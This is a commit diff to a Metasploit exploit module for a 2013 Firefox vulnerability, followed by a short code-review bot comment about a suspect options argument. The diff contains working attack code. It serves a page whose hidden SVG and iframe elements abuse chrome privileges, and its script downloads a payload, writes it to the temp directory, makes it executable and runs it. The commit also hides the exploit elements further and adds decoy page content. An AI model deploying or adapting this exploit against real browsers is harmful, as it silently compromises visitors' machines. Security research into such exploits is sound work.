Whitespace tweaks and minor bug fix. Wrong payloads still run.
parent
f4b6db8c49
commit
178a43a772
|
@ -71,8 +71,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'DefaultTarget' => 0,
|
||||
'Author' =>
|
||||
[
|
||||
'joev', # metasploit module
|
||||
'Marius Mlynski' # discovery & bug report
|
||||
'Marius Mlynski', # discovery & bug report
|
||||
'joev' # metasploit module
|
||||
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
|
@ -83,6 +84,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'DisclosureDate' => 'Jan 08 2013'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", '' ] )
|
||||
], Auxiliary::Timed)
|
||||
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
@ -105,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
else
|
||||
# send initial HTML page
|
||||
print_status("Sending #{self.name}")
|
||||
send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
|
||||
send_response_html(cli, generate_html)
|
||||
end
|
||||
handler(cli)
|
||||
end
|
||||
|
@ -153,12 +160,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
x.send(null);
|
||||
alert(x.responseText);
|
||||
var file = Components.classes["@mozilla.org/file/directory_service;1"]
|
||||
.getService(Components.interfaces.nsIProperties)
|
||||
.get("TmpD", Components.interfaces.nsIFile);
|
||||
.getService(Components.interfaces.nsIProperties)
|
||||
.get("TmpD", Components.interfaces.nsIFile);
|
||||
file.append('#{payload_filename}');
|
||||
|
||||
var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"].
|
||||
createInstance(Components.interfaces.nsIFileOutputStream);
|
||||
var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]
|
||||
.createInstance(Components.interfaces.nsIFileOutputStream);
|
||||
stream.init(file, 0x04 \| 0x08 \| 0x20, 0666, 0);
|
||||
stream.write(x.responseText, x.responseText.length);
|
||||
if (stream instanceof Components.interfaces.nsISafeOutputStream) {
|
||||
|
@ -169,7 +175,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
#{chmod_code}
|
||||
alert(file.path);
|
||||
var process = Components.classes["@mozilla.org/process/util;1"]
|
||||
.createInstance(Components.interfaces.nsIProcess);
|
||||
.createInstance(Components.interfaces.nsIProcess);
|
||||
process.init(file);
|
||||
process.run(false,[],0);
|
||||
|
|
||||
|
@ -204,18 +210,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
:access_string => 'access',
|
||||
:frame_ref => 'frames[0]',
|
||||
:frame_name => 'n',
|
||||
:loader_path => "#{base_url}.swf"
|
||||
:loader_path => "#{base_url}.swf",
|
||||
:content => self.datastore['CONTENT'] || ''
|
||||
}
|
||||
%Q|
|
||||
<!doctype html>
|
||||
<html>
|
||||
<head>
|
||||
<meta http-equiv="content-type" content="text/html; charset=utf-8">
|
||||
<base href="chrome://browser/content/">
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<svg>
|
||||
<svg style='position: absolute;top:-500px;left:-500px;width:1px;height:1px'>
|
||||
<symbol id="#{vars[:symbol_id]}">
|
||||
<foreignObject>
|
||||
<object></object>
|
||||
|
@ -250,7 +256,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
</script>
|
||||
|
||||
<iframe style="position:absolute;top:-500px;left:-500px;width:1px;height:1px"
|
||||
name="#{vars[:frame_name]}"></iframe>
|
||||
name="#{vars[:frame_name]}"></iframe>
|
||||
#{vars[:content]}
|
||||
</body>
|
||||
</html>
|
||||
|
|
||||
|
|
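Review bot: The `register_options` call added in the second hunk passes `Auxiliary::Timed` as its owner argument, which looks copied from an auxiliary module. This class is declared as `Msf::Exploit::Remote`, and nothing in the visible hunks includes that mixin. The owner is normally the registering module's own class, so the closing line would read `], self.class)`. The `initialize` body and the top of the class lie outside the hunks, so confirm the mixin is not included higher up before changing it.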